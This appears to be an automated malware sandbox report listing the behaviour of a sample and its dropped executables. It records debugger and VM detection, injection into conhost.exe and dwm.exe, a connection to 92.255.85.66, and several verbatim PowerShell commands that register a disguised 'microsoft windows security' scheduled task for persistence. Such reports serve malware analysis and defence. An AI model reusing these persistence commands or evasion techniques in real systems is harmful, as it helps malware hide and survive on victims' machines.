                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHAV
                          Source: 2779421088.exe, 00000009.00000002.1607528367.0000000000FBC000.00000002.00000001.01000000.0000000B.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: FIDDLER.EXE
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: TORUNS.EXEDUMPCAP.EXEDE4R
                          Source: svchost.exe, 0000000A.00000002.1704642025.0000000002D00000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DUMPCAP.EXE
                          Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 900000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeThread delayed: delay time: 930000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\sysnldcvmr.exeWindow / User API: threadDelayed 4531Jump to behavior
                          Source: C:\Windows\sysnldcvmr.exeWindow / User API: threadDelayed 1067Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7119
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2284
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7907
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1542
                          Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 559
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4362
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4990
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8172
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2320
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeEvaded block: after key decisiongraph_4-4416
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeEvaded block: after key decisiongraph_4-4357
                          Source: C:\Windows\sysnldcvmr.exeEvaded block: after key decisiongraph_7-4355
                          Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_5-5747
                          Source: C:\Windows\sysnldcvmr.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-4374
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeEvasive API call chain: RegQueryValue,DecisionNodes,Sleepgraph_4-5280
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_4-4371
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleep
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeAPI coverage: 3.9 %
                          Source: C:\Windows\sysnldcvmr.exeAPI coverage: 1.0 %
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_0040CCF07_2_0040CCF0
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_0040CCF04_2_0040CCF0
                          Source: C:\Windows\sysnldcvmr.exe TID: 7748Thread sleep time: -40000s >= -30000sJump to behavior
                          Source: C:\Windows\sysnldcvmr.exe TID: 7780Thread sleep count: 4531 > 30Jump to behavior
                          Source: C:\Windows\sysnldcvmr.exe TID: 7780Thread sleep time: -13593000s >= -30000sJump to behavior
                          Source: C:\Windows\sysnldcvmr.exe TID: 7748Thread sleep count: 1067 > 30Jump to behavior
                          Source: C:\Windows\sysnldcvmr.exe TID: 7912Thread sleep count: 335 > 30Jump to behavior
                          Source: C:\Windows\sysnldcvmr.exe TID: 7764Thread sleep time: -900000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exe TID: 8020Thread sleep time: -930000s >= -30000sJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exe TID: 6720Thread sleep time: -90000s >= -30000sJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7472Thread sleep count: 7119 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7468Thread sleep count: 2284 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3684Thread sleep time: -8301034833169293s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5204Thread sleep count: 7907 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1400Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4356Thread sleep count: 1542 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612Thread sleep count: 4362 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6224Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6560Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\dwm.exe TID: 1580Thread sleep count: 31 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8008Thread sleep count: 4990 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6948Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6588Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6960Thread sleep count: 8172 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -4611686018427385s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1360Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2872Thread sleep count: 2320 > 30
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4476Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6472Thread sleep time: -1844674407370954s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\SysWOW64\svchost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                          Source: C:\Windows\System32\dwm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeLast function: Thread delayed
                          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,4_2_004066B0
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00406570
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,5_2_004066B0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 5_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00406570
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_004066B0 _chkstk,wsprintfW,wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,PathFileExistsW,SetFileAttributesW,DeleteFileW,PathFileExistsW,CreateDirectoryW,SetFileAttributesW,PathFileExistsW,CopyFileW,SetFileAttributesW,PathFileExistsW,SetFileAttributesW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpiW,PathMatchSpecW,wsprintfW,SetFileAttributesW,DeleteFileW,PathFileExistsW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,7_2_004066B0
                          Source: C:\Windows\sysnldcvmr.exeCode function: 7_2_00406570 CreateDirectoryW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,wsprintfW,MoveFileExW,FindNextFileW,FindClose,RemoveDirectoryW,7_2_00406570
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F71B09 FindFirstFileExW,9_2_00F71B09
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeCode function: 13_2_001D1A20 memset,memset,PathCombineW,FindFirstFileW,lstrcmpW,lstrcmpW,PathCombineW,CharLowerW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathMatchSpecW,PathCombineW,FindNextFileW,CloseHandle,13_2_001D1A20
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00402020 GetSystemInfo,InitializeCriticalSection,CreateEventA,CreateIoCompletionPort,WSASocketA,setsockopt,htons,bind,listen,WSACreateEvent,WSAEventSelect,4_2_00402020
                          Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 40000Jump to behavior
                          Source: C:\Windows\sysnldcvmr.exeThread delayed: delay time: 900000Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeThread delayed: delay time: 930000Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CCE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\tu
                          Source: svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                          Source: f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CE8000.00000004.00000020.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004CBA000.00000004.00000020.00020000.00000000.sdmp, f5TWdT5EAc.exe, 00000000.00000002.1369536312.0000000004C7E000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000BAE000.00000004.00000020.00020000.00000000.sdmp, 34D7.exe, 00000003.00000002.1456172857.0000000000C08000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.000000000062E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000003.1504556387.000000000068E000.00000004.00000020.00020000.00000000.sdmp, sysnldcvmr.exe, 00000005.00000002.3945918610.000000000068E000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, 1171111125.exe, 00000008.00000002.1602703720.0000000000CBA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                          Source: svchost.exe, 0000000A.00000002.1704560662.0000000002C12000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW(
                          Source: svchost.exe, 0000000A.00000003.1608484945.00000000050E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                          Source: svchost.exe, 0000000A.00000002.1704611548.0000000002C5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD RfComm [Bluetooth]Hyper-V RAW
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeAPI call chain: ExitProcess graph end nodegraph_4-4366
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeAPI call chain: ExitProcess graph end nodegraph_4-4356
                          Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_5-4391
                          Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_5-4358
                          Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_5-4366
                          Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_7-4390
                          Source: C:\Windows\sysnldcvmr.exeAPI call chain: ExitProcess graph end nodegraph_7-4366
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeProcess information queried: ProcessInformationJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeProcess queried: DebugPort
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E1840 LdrInitializeThunk,24_2_009E1840
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeCode function: 3_2_00251B28 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_00251B28
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009EAAAC LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,24_2_009EAAAC
                          Source: C:\Users\user\Desktop\f5TWdT5EAc.exeCode function: 0_2_04A3CCC0 mov eax, dword ptr fs:[00000030h]0_2_04A3CCC0
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_3_00F79277 mov eax, dword ptr fs:[00000030h]9_3_00F79277
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F79277 mov eax, dword ptr fs:[00000030h]9_2_00F79277
                          Source: C:\Windows\SysWOW64\svchost.exeCode function: 10_3_02740283 mov eax, dword ptr fs:[00000030h]10_3_02740283
                          Source: C:\Users\user\AppData\Local\Temp\896429707.exeCode function: 4_2_00409EE0 GetProcessHeaps,4_2_00409EE0
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeCode function: 3_2_00251B28 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,3_2_00251B28
                          Source: C:\Users\user\AppData\Local\Temp\1171111125.exeCode function: 8_2_00551AF8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,8_2_00551AF8
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F6CB32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00F6CB32
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F6CCC5 SetUnhandledExceptionFilter,9_2_00F6CCC5
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F71508 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00F71508
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeCode function: 9_2_00F6CFC3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00F6CFC3
                          Source: C:\Users\user\AppData\Local\Temp\78476062.exeCode function: 11_2_007C1C08 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,11_2_007C1C08
                          Source: C:\Users\user\AppData\Local\Temp\640832494.exeCode function: 13_2_001D27B8 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,13_2_001D27B8
                          Source: C:\Users\user\AppData\Local\Temp\1657630034.exeCode function: 19_2_00391898 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,19_2_00391898
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E78E7 SetUnhandledExceptionFilter,24_2_009E78E7
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E4C71 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_009E4C71
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E5E8F _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,24_2_009E5E8F
                          Source: C:\Users\user\AppData\Local\Temp\2910625892.exeCode function: 24_2_009E961A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,24_2_009E961A
                          Source: C:\Windows\System32\conhost.exeCode function: 32_2_00007FF6CE1F1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,GetStartupInfoA,32_2_00007FF6CE1F1180

                          HIPS / PFW / Operating System Protection Evasion

                          barindex
                          Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 92.255.85.66 5188Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\2688734187.exeNtQuerySystemInformation: Direct from: 0x7FF6D3C35B0E
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeNtQuerySystemInformation: Direct from: 0x7FF731CD5B0E
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeNtQuerySystemInformation: Direct from: 0x7FF7A1EF5B0E
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\conhost.exe protection: readonly
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeSection loaded: NULL target: C:\Windows\System32\dwm.exe protection: readonly
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 4828
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeThread register set: target process: 3728
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\conhost.exe base: 736FF96010
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeMemory written: C:\Windows\System32\dwm.exe base: 424A78010
                          Source: C:\Users\user\AppData\Local\Temp\2779421088.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"Jump to behavior
                          Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"Jump to behavior
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 456 -p 5444 -ip 5444
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 5444 -s 136
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1852 -ip 1852
                          Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1852 -s 1332
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
                          Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\dwm.exe C:\Windows\System32\dwm.exe
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#ydcfdz#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
                          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe c:\windows\system32\windowspowershell\v1.0\powershell.exe <#evrkcgqew#> if([system.environment]::osversion.version -lt [system.version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'microsoft windows security' /tr '''c:\users\user\microsoft windows security\winupsecvmgr.exe''' } else { register-scheduledtask -action (new-scheduledtaskaction -execute 'c:\users\user\microsoft windows security\winupsecvmgr.exe') -trigger (new-scheduledtasktrigger -atlogon) -settings (new-scheduledtasksettingsset -allowstartifonbatteries -disallowhardterminate -dontstopifgoingonbatteries -dontstoponidleend -executiontimelimit (new-timespan -days 1000)) -taskname 'microsoft windows security' -runlevel 'highest' -force; }
